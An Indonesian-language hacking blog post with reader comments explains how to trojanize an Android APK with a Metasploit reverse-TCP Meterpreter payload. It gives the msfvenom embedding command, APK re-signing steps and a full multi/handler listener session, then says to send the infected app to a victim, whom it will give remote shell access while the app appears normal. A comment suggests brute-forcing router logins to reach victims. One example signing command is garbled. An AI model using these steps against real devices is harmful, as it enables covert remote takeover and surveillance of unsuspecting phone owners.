• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Backdooring APK Files With Metasploit Payloads

March 25, 2016 by Jack Wilder 10 Comments

Sesuai judul nya, kali ini saya akan share cara menyisipkan payloads pada aplikasi android ( .apk ) . Dengan begitu aplikasi apk yang diinstall oleh korban tetap berjalan sebagaimana mestinya, hanya saja payloads juga ikut tereksekusi saat aplikasi dijalankan. Oke langsung saja ke tutorial nya .

Untuk bahan bahannya siahkan download :

Download Android Backdoor
Di dalam nya sudah ada tools dalam bahasa ruby untuk meng-embed payload ke dalam file apk nya, serta SignAPK agar file apk nya bisa terinstall di semua jenis android.
Pertama, kalian download dulu file apk yang ingin disisipi backdoor. Bisa di apk4fun atau situs download apk lainnya. Jika sudah punya, skip ke langkah kedua.
Masukkan file .apk nya tadi kedalam satu folder dengan apk-embed.rb .
Lalu masukkan command :

sudo ruby apk-embed.rb [aplikasi.apk] [msfvenom options]

Contoh :

sudo ruby apk-embed.rb com.leo.appmaster-3.3.2.apk -p android/meterpreter/reverse_tcp LHOST=192.168.48.1 LPORT=666

Penggunaan sudo disini karena msfvenom membutuhkan hak akses root. Jika kalian sudah berada dalam posisi root sebelumnya, tidak perlu menggunakan sudo.
Jika ada notice :

Infected file com_backdoored.apk ready.

Berarti proses backdooring sudah selesai.
Tahap selanjutnya adalah melakukan sign apk agar file apk yang kita jadikan payload nanti kompatibel di semua versi android.
caranya, masukkan file com_backdoored.apk tadi ke folder SignAPK.
Lalu masukkan perintah :

java -jar signapk.jar certificate.pem key.pk8 fileasli.apk filehasilsign.apk

Contoh :

java -jar certificate.pem key.pk8 com_backdoored.apk com.leo.appmaster-3.3.2.apk

Selanjutnya kita set metasploit dengan ip dan port yang sama seperti di payload yang dibuat sebelum nya.

msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.48.1
LHOST => 192.168.48.1
msf exploit(handler) > set LPORT 666
LPORT => 666
msf exploit(handler) > exploit

Nah tinggal kirim apk file tadi ke korban.
APK yang telah disisipi payload tadi tetap akan terlihat normal di device korban.

Hanya saja saat aplikasi tersebut dibuka oleh korban, kita juga mendapatkan meterpreter akses di terminal kita.

Untuk yang masih bingung silahkan lihat video nya disini :

Nah mungkin sekian dulu tutorial kali ini, semoga bermanfaat.
Share juga ke teman teman mu biar mereka tau.
Notice :
Saya menulis ini dengan tangan saya, dengan pemikiran saya, dengan gaya bahasa saya, jadi tolong yang mau copas sertakan sumber link hidup ke postingan ini.
Best regards :
Jack Wilder
Shares

Filed Under: Uncategorized Tagged With: Android, Metasploit

Reader Interactions

Comments

  1. Anonim says

    May 9, 2016 at 8:09 am

    Misal di lain jaring ex internet, agar si korban dapat terhubung dengan penyerang tanpa penyerang memiliki sebuah ip public statis bagaimana? Lalu, semisal dalam sebuah jaringan LAN, host-host yang terhubung di jaringan tidak bisa berkomunikasi dengan host lainnya karena mungkin telah di forward ke ip tertentu dan exploitasi pun gagal karena tidak adanya hubungan penyerang dengan korban di satu jaringan. Pertanyaannya bagaimana caranya agar antar host bisa berkomunikasi di LAN tanpa merubah setting router?
    Mohon maaf terlalu banyak kata2 bermaksud agar lebih detail. Terimakasih.

    Reply
    • Pku.LNX# says

      March 5, 2019 at 11:06 pm

      jika semua yang anda tanyakan bergantung dari Router krn kemungkinan tidak bisa tersambung Host-Host yang ada.coba saja dulu di brute Router Login nya gan dan kita
      setting sendiri apa yg perlu kita ganti.ini biasanya terjadi karena si Admin men-Disable Broadcasting dari settingan Router nya itulah kenapa kita tidak bisa saling berkomunikasi antar host padahal masih dalam jangkauan LAN.
      saya sendiri melakukan PenTest utk menguji Metasploit dalam jangkauan LAN tanpa menggunakan Port,kenapa bisa konek ?? ya itu Broadcasting nya tidak di Disable oleh admin karena jangkauan LAN nya itu adalah Komputer Labor sekolah saya dulu biasa digunakan utk ujian atau prakter komputer lainnya.

      🙂

      Reply
  2. agrivin jonathan putra says

    May 22, 2016 at 1:39 pm

    om kalo minta source code dari google itu gimana ya?

    Reply
  3. robin reverend says

    August 8, 2016 at 1:33 pm

    ane ada masalah kaya gini gan

    java -jar signapk.jar testkey.x509.pem tesykey.pk8 psyphon.backdored.apk psyphon.apk
    java.io.FileNotFoundException: tesykey.pk8 (No such file or directory)
    at java.io.FileInputStream.open(Native Method)
    at java.io.FileInputStream.(FileInputStream.java:146)
    at com.android.signapk.SignApk.readPrivateKey(SignApk.java:136)
    at com.android.signapk.SignApk.main(SignApk.java:319)

    Reply
  4. Adil Wasiso says

    September 22, 2016 at 12:59 pm

    apk backdoor gagal gimana ini

    Reply
  5. hari marthin says

    November 15, 2016 at 11:23 pm

    Ini hasil orang lain. Yg bikin tulisan ini ga kreatif, cuman bisa copas punya orang luar. Payah

    Reply
    • Ratna Antika says

      February 13, 2018 at 8:54 pm

      “copas” ? setolol itukah dirimu?

      Reply
  6. Muhammad Ari Sawali says

    December 19, 2016 at 1:42 pm

    pake Backbox atau Kalilinux?

    Reply
  7. dragonsec says

    September 9, 2018 at 7:43 pm

    punya ane error gan gimana nih?
    saya pake parrotsec gan

    “Expception in thread “main” java.lag .NoClassDefFoundError : sun/misc/BASE64Encode”

    Reply
  8. rin@linuxsec.org says

    December 26, 2019 at 1:56 pm

    Ya lord gitu aja

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Open Redirect Bypass Cheat Sheet

Azure Traffic Manager Custom Domain or Subdomain Takeover

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

MIME Type Sniffing pada Form Upload Gambar

RCE pada Redis via Master-Slave Replication

Shopify Custom Domain or Subdomain Takeover

Hack Targeted Website using Reverse IP

LinuxSec / 74 queries in 0.11 seconds